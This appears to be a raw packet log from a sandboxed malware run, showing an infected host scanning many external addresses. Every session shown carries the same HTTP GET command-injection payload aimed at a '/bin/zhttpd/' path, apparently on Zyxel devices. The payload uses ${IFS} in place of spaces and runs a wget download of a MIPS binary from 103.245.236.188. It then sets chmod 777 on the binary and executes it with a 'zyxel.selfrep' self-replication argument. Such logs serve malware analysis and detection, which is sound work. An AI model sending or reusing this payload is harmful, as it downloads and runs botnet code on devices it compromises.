                                                Jan 12, 2024 18:16:27.554183960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5387192.168.2.23451788.249.221.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554229975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5388192.168.2.2333774116.116.91.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554261923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5389192.168.2.23547829.39.66.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554317951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5390192.168.2.2334796144.44.231.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554343939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5391192.168.2.235345860.77.113.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554375887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5392192.168.2.2349762149.6.153.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554425955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5393192.168.2.2344532161.174.174.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554465055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5394192.168.2.235420451.226.93.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554523945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5395192.168.2.235236261.129.60.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554548979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5396192.168.2.2347516110.171.195.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554582119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5397192.168.2.235730637.206.1.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554613113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5398192.168.2.2339188192.133.69.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554636002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5399192.168.2.234960087.158.52.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554668903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5400192.168.2.2337234110.60.210.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554712057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5401192.168.2.2357940180.207.207.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554738998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5402192.168.2.23343008.199.239.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554780960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5403192.168.2.2334806179.56.190.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554826021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5404192.168.2.234108242.53.187.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554877996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5405192.168.2.2352748179.81.0.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554900885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5406192.168.2.2352574183.116.251.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554929018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5407192.168.2.2352918137.160.212.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.554965019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5408192.168.2.2360958108.155.203.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555011988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5409192.168.2.234004067.1.21.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555035114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5410192.168.2.2359294183.251.58.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555088997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5411192.168.2.2360658119.68.28.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555131912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5412192.168.2.235334681.183.160.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555150032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5413192.168.2.2345906204.82.59.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555187941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5414192.168.2.2354408138.57.9.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555239916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5415192.168.2.235858641.160.153.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555278063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5416192.168.2.233886698.244.13.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555300951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5417192.168.2.233880250.157.62.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555361032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5418192.168.2.2359700151.17.35.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555397034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5419192.168.2.2335042172.157.242.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555434942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5420192.168.2.2358518194.213.159.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555465937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5421192.168.2.2354890218.253.222.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555505991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5422192.168.2.2344840218.218.123.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555551052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5423192.168.2.235779050.134.95.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555573940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5424192.168.2.2342916120.122.119.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555608988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5425192.168.2.235318084.236.138.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555632114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5426192.168.2.2351970154.180.39.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555670023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5427192.168.2.2351992134.32.188.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555721045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5428192.168.2.233919281.76.30.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555747986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5429192.168.2.234480098.180.170.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555782080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5430192.168.2.2337566173.213.101.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555845022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5431192.168.2.235964262.66.25.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555869102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5432192.168.2.234652081.92.245.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555908918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5433192.168.2.2334728140.198.215.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555934906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5434192.168.2.2358944167.76.102.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.555977106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5435192.168.2.2352004130.247.253.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556025982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5436192.168.2.233371893.161.55.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556066990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5437192.168.2.2336138217.17.158.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556103945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5438192.168.2.2337824166.255.176.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556149960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5439192.168.2.2347804207.93.0.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556180954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5440192.168.2.2333254175.114.89.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556210995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5441192.168.2.2349506156.183.186.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556261063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5442192.168.2.2346996125.237.186.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556323051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5443192.168.2.2352340185.88.75.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556333065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5444192.168.2.2355920171.165.73.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556402922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5445192.168.2.2357612146.142.167.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556452036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5446192.168.2.2356470100.211.3.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556497097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5447192.168.2.2357282118.165.137.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556530952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5448192.168.2.235486835.73.255.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.556579113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5449192.168.2.2346220135.25.233.225443
                                                TimestampBytes transferredDirectionData
